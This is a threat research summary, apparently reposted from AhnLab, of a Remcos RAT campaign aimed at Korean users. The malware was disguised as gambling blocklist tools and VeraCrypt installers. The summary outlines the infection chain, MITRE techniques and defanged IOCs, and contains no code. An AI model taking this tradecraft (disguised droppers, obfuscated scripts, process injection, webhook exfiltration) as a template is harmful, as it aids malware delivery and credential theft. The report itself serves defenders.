Threat Research

Remcos RAT Being Distributed to Korean Users

Ahnlab
Remcos RAT Being Distributed to Korean Users

AhnLab confirmed a Remcos RAT campaign targeting users in South Korea that uses fake blocklist‑lookup tools for illegal gambling sites and counterfeit VeraCrypt installers to distribute multi‑stage droppers. The attack chain leverages obfuscated VBS/PowerShell scripts, a .NET injector that sends logs via Discord webhooks and injects Remcos into AddInProcess32.exe, with IOCs including chaoanh[.]xyz URLs, specific IPs, and multiple MD5 hashes. #Remcos #VeraCrypt

Keypoints

  • Remcos RAT is being distributed to users in South Korea by impersonating blocklist‑lookup tools used in illegal gambling ecosystems and by posing as VeraCrypt installers.
  • Initial droppers embed multiple malicious VBS scripts in resources that are written to %TEMP% and executed, and some samples are packaged as 7z SFX installers.
  • The infection chain comprises multiple obfuscated VBS and PowerShell stages that hide a Base64‑encoded PE payload and lead to a .NET injector and Remcos payload delivery.
  • The .NET injector exfiltrates logs via Discord webhooks, downloads and decrypts the Remcos payload, and injects it into AddInProcess32.exe; it contains Korean language strings in its routines.
  • Remcos capabilities include remote control, keylogging, screenshots, webcam/microphone access, and credential extraction from web browsers; offline keylogs may be stored in %ALLUSERSPROFILE%remcos.
  • IOCs published include five MD5 hashes, multiple download URLs hosted on chaoanh[.]com/.xyz, and three C2 IP addresses using TLS; filenames used include *****usercon.exe, blackusernon.exe, and installer.exe.

MITRE Techniques

  • [T1036 ] Masquerading – Attackers disguised malware as legitimate tools and installers, e.g., pretending to be VeraCrypt installers or “Blocklist User DB Lookup” tools (‘Another strain disguises itself as a VeraCrypt utility installer, distributed as installer.exe.’).
  • [T1204.002 ] User Execution – Users are lured into executing malicious files delivered via web browsers and Telegram with deceptive filenames (‘Distribution has occurred through web browsers and Telegram, using file names such as “*****usercon.exe” or “blackusernon.exe.”’).
  • [T1027 ] Obfuscated Files or Information – The campaign uses multiple stages of obfuscated VBS and PowerShell scripts with dummy comments and junk data to hide payloads (‘The threat actor used multiple stages of obfuscated VBS and PowerShell scripts… include dummy comments, junk data, and misleading extensions.’).
  • [T1105 ] Ingress Tool Transfer – Payloads and staged components are retrieved from remote URLs (chaoanh[.]xyz/chaoanh[.]com) during the infection chain (‘It then downloads Remcos RAT payload from a URL passed as an argument’).
  • [T1071.001 ] Application Layer Protocol: Web Protocols (HTTPS/TLS) – C2 communications are conducted over TLS to remote IPs and ports listed in configurations (‘142.248.231[.]252:48192 (TLS)’, ‘142.248.231[.]251:2404 (TLS)’).
  • [T1055 ] Process Injection – The .NET injector decrypts the Remcos payload and injects it into AddInProcess32.exe to run stealthily (‘injects it into the AddInProcess32.exe process.’).
  • [T1056.001 ] Input Capture: Keylogging – Remcos variants enable offline keylogging and store captured keystrokes locally (‘offline keylogging enabled, the captured keystroke strings are stored in the %ALLUSERSPROFILE%remcos directory.’).
  • [T1555.003 ] Credentials from Web Browsers – The RAT includes functionality to extract credentials from web browsers (‘extraction of web browser credentials’).
  • [T1102 ] Web Service – The injector exfiltrates logs to the attacker using Discord Webhooks, leveraging a web service for outbound communication (‘The injector sends logs to the attacker via Discord Webhooks.’).
  • [T1547.001 ] Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder – Variants use registry keys (including Korean‑language strings) which indicate registry‑based persistence (‘Some variants… use Korean strings in their mutex names and registry keys.’).

Indicators of Compromise

  • [MD5 Hash ] Sample file hashes observed in the campaign – 06c71658466d1dcd067ff0f23a8c488e, 0e7a97c8ecf83f26b23c394d0e06001b, and 3 more hashes.
  • [URL ] Download and payload delivery endpoints used to host staged payloads – https[:]//chaoanh[.]com/XX12[.]JPG, https[:]//chaoanh[.]xyz/Aw21[.]JPG, and 3 more URLs.
  • [Domain ] Domains hosting malicious JPG‑named downloaders and payloads – chaoanh[.]xyz, chaoanh[.]com.
  • [IP Address ] Command‑and‑control servers observed (TLS) – 142[.]248[.]231[.]251, 205[.]198[.]88[.]94, and 1 more IP (142[.]248[.]231[.]252).
  • [File name / Path ] Distribution and temporary filenames used during execution – %USERPROFILE%downloadsprograms*****usercon.exe, %TEMP%[Random].vbs, and other staged names like Aw21.JPG/XX12.JPG.
  • [File name ] Installer and dropper filenames used to entice execution – installer.exe (VeraCrypt impersonation), blackusernon.exe.

Read more: https://asec.ahnlab.com/en/92160/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint